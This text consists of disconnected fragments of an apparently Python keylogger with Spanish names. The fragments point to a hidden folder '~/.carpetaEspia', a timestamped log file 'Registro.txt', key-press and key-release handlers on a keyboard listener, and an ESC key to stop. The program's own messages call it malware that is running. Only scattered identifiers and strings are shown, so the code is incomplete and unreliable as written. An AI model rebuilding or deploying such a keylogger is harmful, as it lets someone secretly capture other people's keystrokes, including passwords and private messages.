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carpeta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expanduser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"~/.carpetaEspia"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carpeta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log_file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carpeta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"Registro.txt"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log_file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%(asctime)s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%(message)s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teclear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.char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AttributeError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soltar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esc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"Malware detenido."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Listener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on_press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teclear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on_release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soltar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espia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"Malware en funcionamiento. Pulsa ESC para salir."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espia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